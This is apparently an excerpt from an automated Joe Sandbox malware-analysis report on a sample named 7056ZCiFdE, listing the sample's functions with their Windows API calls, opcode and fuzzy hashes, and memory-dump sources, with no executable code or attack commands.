                                    • Opcode ID: a6989115e358bffdd968ddce3f420c244f6a5cec52c735e49d09b250f72b6e74
                                    • Instruction ID: 57e202f85c07e651ae0928027d805be1dad96e949a762dfd3c840953c86877c3
                                    • Opcode Fuzzy Hash: a6989115e358bffdd968ddce3f420c244f6a5cec52c735e49d09b250f72b6e74
                                    • Instruction Fuzzy Hash: E6113A7624C30BB9FA302628DC06EA7779CFB12324F200267F910E19D2FEA1A8616951
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 008F88D7
                                    • CoInitialize.OLE32(00000000), ref: 008F8904
                                    • CoUninitialize.COMBASE ref: 008F890E
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 008F8A0E
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 008F8B3B
                                    • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00912C0C), ref: 008F8B6F
                                    • CoGetObject.OLE32(?,00000000,00912C0C,?), ref: 008F8B92
                                    • SetErrorMode.KERNEL32(00000000), ref: 008F8BA5
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008F8C25
                                    • VariantClear.OLEAUT32(?), ref: 008F8C35
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                    • String ID:
                                    • API String ID: 2395222682-0
                                    • Opcode ID: dd38d30a2642019df452f16dd04d18a03b27a6e958107ebd5fa810f682a2142a
                                    • Instruction ID: 3b2b74716df53bf5d0014b493ef7d9a85a208201f41c84cb602873773bab852b
                                    • Opcode Fuzzy Hash: dd38d30a2642019df452f16dd04d18a03b27a6e958107ebd5fa810f682a2142a
                                    • Instruction Fuzzy Hash: E3C102B16083099FC700EF68C88496AB7E9FF89748F00495DFA8ADB251DB71ED05CB52
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 008E7A6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ArraySafeVartype
                                    • String ID:
                                    • API String ID: 1725837607-0
                                    • Opcode ID: d1b2572c4abb92430ac203420eadfc302e8ac6996ebe14c9efacdab29df82a87
                                    • Instruction ID: 4cae241cfe73e8f0844cf10bcd5266ea575e484b71fd2854f3aed7c62509106e
                                    • Opcode Fuzzy Hash: d1b2572c4abb92430ac203420eadfc302e8ac6996ebe14c9efacdab29df82a87
                                    • Instruction Fuzzy Hash: 60B1F67190825A9FDB10DFA9C884BBEB7F8FF4A324F240429EA11E7251D734E941CB91
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 008E11F0
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008E0268,?,00000001), ref: 008E1204
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 008E120B
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0268,?,00000001), ref: 008E121A
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 008E122C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0268,?,00000001), ref: 008E1245
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0268,?,00000001), ref: 008E1257
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008E0268,?,00000001), ref: 008E129C
                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008E0268,?,00000001), ref: 008E12B1
                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008E0268,?,00000001), ref: 008E12BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: 7afae62cd9d76ef4d30d1dcccc73278eeb515f85edf78579c170b02c4f964a90
                                    • Instruction ID: 9aa906932198c64c3d17d6c68bc195d01b1ef1c1256a0c016d3e0c90ddab7571
                                    • Opcode Fuzzy Hash: 7afae62cd9d76ef4d30d1dcccc73278eeb515f85edf78579c170b02c4f964a90
                                    • Instruction Fuzzy Hash: 8D31ACB9628208AFDF20DF55EC88FA937A9FB57715F104165FA00C71A0D7709E44AB61
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0088FAA6
                                    • OleUninitialize.OLE32(?,00000000), ref: 0088FB45
                                    • UnregisterHotKey.USER32(?), ref: 0088FC9C
                                    • DestroyWindow.USER32(?), ref: 008C45D6
                                    • FreeLibrary.KERNEL32(?), ref: 008C463B
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008C4668
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: c3a1885d6d3e9fec1bae348e5f3059e4a749d80aa75f3b7ee7766a9856f9156c
                                    • Instruction ID: 5b921a0f63454d273fa223c1ee8133de51d4fe5e6b4597179a2b9027c88d837e
                                    • Opcode Fuzzy Hash: c3a1885d6d3e9fec1bae348e5f3059e4a749d80aa75f3b7ee7766a9856f9156c
                                    • Instruction Fuzzy Hash: C0A147303012268FDB29EB18C9A4F69B764FF15714F1442ADE90AEB262DB30ED56CF51
                                    APIs
                                    • EnumChildWindows.USER32(?,008DA439), ref: 008DA377
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: 46ef15ae8e55e79ebb7d1901454e701ed695b0355635706c3eb13f0133d8c5e2
                                    • Instruction ID: 915b6bf8bb6ad2f5f227f69110a2eebca4f63cd09ed449706b423f0c2d9c0ef9
                                    • Opcode Fuzzy Hash: 46ef15ae8e55e79ebb7d1901454e701ed695b0355635706c3eb13f0133d8c5e2
                                    • Instruction Fuzzy Hash: 2991B630900605AADB1CEFA4C441BEDFBB5FF05314F64821AE45AE7341DF31AA99DB92
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00882EAE
                                      • Part of subcall function 00881DB3: GetClientRect.USER32(?,?), ref: 00881DDC
                                      • Part of subcall function 00881DB3: GetWindowRect.USER32(?,?), ref: 00881E1D
                                      • Part of subcall function 00881DB3: ScreenToClient.USER32(?,?), ref: 00881E45
                                    • GetDC.USER32 ref: 008BCD32
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008BCD45
                                    • SelectObject.GDI32(00000000,00000000), ref: 008BCD53
                                    • SelectObject.GDI32(00000000,00000000), ref: 008BCD68
                                    • ReleaseDC.USER32(?,00000000), ref: 008BCD70
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008BCDFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: c00bc7382754fef83fbca39360f538ed3a2fdf3ab67feca2938d16615b6ad9f5
                                    • Instruction ID: 96a823d29119b7a776833d5914277834699c9cbeae3a6a773cc5729beb874c72
                                    • Opcode Fuzzy Hash: c00bc7382754fef83fbca39360f538ed3a2fdf3ab67feca2938d16615b6ad9f5
                                    • Instruction Fuzzy Hash: 4671DC35500209EFCF219F64C894AEA7FB5FF49324F18427AED55DA2A6C7318C81EB60
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008F1A50
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008F1A7C
                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 008F1ABE
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008F1AD3
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008F1AE0
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008F1B10
                                    • InternetCloseHandle.WININET(00000000), ref: 008F1B57
                                      • Part of subcall function 008F2483: GetLastError.KERNEL32(?,?,008F1817,00000000,00000000,00000001), ref: 008F2498
                                      • Part of subcall function 008F2483: SetEvent.KERNEL32(?,?,008F1817,00000000,00000000,00000001), ref: 008F24AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                    • String ID:
                                    • API String ID: 2603140658-3916222277
                                    • Opcode ID: aa05f79c57a8a318e9b30ed35f81abfd610e06d37428cdb2135e22eb13e16ae0
                                    • Instruction ID: 26bdf3cea8d82e169e7bf87b5bf0f45666414ad3058faed7f18efa6716fc6522
                                    • Opcode Fuzzy Hash: aa05f79c57a8a318e9b30ed35f81abfd610e06d37428cdb2135e22eb13e16ae0
                                    • Instruction Fuzzy Hash: 40417BB1505218FEEB118F60CC99FBA7BACFB08354F00412AFA05DA141E7B09E449BA1
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0090F910), ref: 008F8D28
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0090F910), ref: 008F8D5C
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008F8ED6
                                    • SysFreeString.OLEAUT32(?), ref: 008F8F00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 23acb6788037940a7c94625a0adcd33b2eceb4e94a7339ea98bdb4438b502ee1
                                    • Instruction ID: d6fed224b27382a2b37d4263499c2d496f2121651a16977f2f76ec0332c532f3
                                    • Opcode Fuzzy Hash: 23acb6788037940a7c94625a0adcd33b2eceb4e94a7339ea98bdb4438b502ee1
                                    • Instruction Fuzzy Hash: 09F10571A00209EFCB14DFA4C884EBEB7B9FF89314F148498EA55EB251DB31AE45CB51
                                    APIs
                                    • _memset.LIBCMT ref: 008FF6B5
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FF848
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008FF86C
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FF8AC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008FF8CE
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008FFA4A
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008FFA7C
                                    • CloseHandle.KERNEL32(?), ref: 008FFAAB
                                    • CloseHandle.KERNEL32(?), ref: 008FFB22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 089e9ec5df5f2aa2fd43b6387663f63cf9b4391d4cbcb8bac695feebe955aba0
                                    • Instruction ID: fd4a93490d8c2bea269de3ce9ef8b67e2186dcb64fb4b26a50335bdcb55a113c
                                    • Opcode Fuzzy Hash: 089e9ec5df5f2aa2fd43b6387663f63cf9b4391d4cbcb8bac695feebe955aba0
                                    • Instruction Fuzzy Hash: A0E1AE312042559FCB14EF38C891A6ABBE1FF85354F18856DFA99CB2A2DB70DC41CB52
                                    APIs
                                      • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00882036,?,00000000,?,?,?,?,008816CB,00000000,?), ref: 00881B9A
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008820D3
                                    • KillTimer.USER32(-00000001,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 0088216E
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 008BBCA6
                                    • DeleteObject.GDI32(00000000), ref: 008BBD1C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 2402799130-0
                                    • Opcode ID: a63f17b4ddf2a3bff9d8a862e5f0abf87a2f31f04aef85746f161df046dd838c
                                    • Instruction ID: eef0d4c45add6ead09c89cfaf3f6d61a5d4742c6dfc61b8a4e22cbfcce084888
                                    • Opcode Fuzzy Hash: a63f17b4ddf2a3bff9d8a862e5f0abf87a2f31f04aef85746f161df046dd838c
                                    • Instruction Fuzzy Hash: 2F61DE39124A04DFCB35AF54D958B29B7F1FF41316F208428E042CBA71CBB4A881EF91
                                    APIs
                                      • Part of subcall function 008E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E3697,?), ref: 008E468B
                                      • Part of subcall function 008E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E3697,?), ref: 008E46A4
                                      • Part of subcall function 008E4A31: GetFileAttributesW.KERNEL32(?,008E370B), ref: 008E4A32
                                    • lstrcmpiW.KERNEL32(?,?), ref: 008E4D40
                                    • _wcscmp.LIBCMT ref: 008E4D5A
                                    • MoveFileW.KERNEL32(?,?), ref: 008E4D75
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: c2c056eba52bc640aab4a856f03efde710ed99847c0a48e6af33d35bfe58fc1c
                                    • Instruction ID: 14a3dba870b75ffba9c1178d3be92c3dc05517866aad7aa30d5e0ad4e4dfb193
                                    • Opcode Fuzzy Hash: c2c056eba52bc640aab4a856f03efde710ed99847c0a48e6af33d35bfe58fc1c
                                    • Instruction Fuzzy Hash: 075151B21083859BD624EB64DC819DB73ECFF86350F00192EF589D3152EE70A688C766
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009086FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: a5ee7e9d0871725ca43543f7726cfd1d0bfb6ceb742e3c8010e0fee28a2fdba0
                                    • Instruction ID: a3829940fd1bd415353eedacfeec32090bf9940c0bdc4cbfb41ca922ede8e156
                                    • Opcode Fuzzy Hash: a5ee7e9d0871725ca43543f7726cfd1d0bfb6ceb742e3c8010e0fee28a2fdba0
                                    • Instruction Fuzzy Hash: 3451B430714244BFDF209B28CC89FAE7BA9FB05724F604615F990E61E1CF76AA90DB51
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008BC2F7
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008BC319
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008BC331
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008BC34F
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008BC370
                                    • DestroyCursor.USER32(00000000), ref: 008BC37F
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008BC39C
                                    • DestroyCursor.USER32(?), ref: 008BC3AB
                                      • Part of subcall function 0090A4AF: DeleteObject.GDI32(00000000), ref: 0090A4E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                    • String ID:
                                    • API String ID: 2975913752-0
                                    • Opcode ID: deb925aecf84d1e43bb53d170d604b932ad27edec487ccd07443488313c33162
                                    • Instruction ID: e148aa32451e961c71b342c278d888248fdb0365edb6ddb9c0b26d7d2ef01912
                                    • Opcode Fuzzy Hash: deb925aecf84d1e43bb53d170d604b932ad27edec487ccd07443488313c33162
                                    • Instruction Fuzzy Hash: EF514674A10209EFDB20EF64CC45FAA7BE5FB58320F104528F902E72A0DB70AD90EB50
                                    APIs
                                      • Part of subcall function 008DA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA84C
                                      • Part of subcall function 008DA82C: GetCurrentThreadId.KERNEL32 ref: 008DA853
                                      • Part of subcall function 008DA82C: AttachThreadInput.USER32(00000000,?,008D9683,?,00000001), ref: 008DA85A
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008D968E
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008D96AB
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008D96AE
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008D96B7
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008D96D5
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008D96D8
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008D96E1
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008D96F8
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008D96FB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
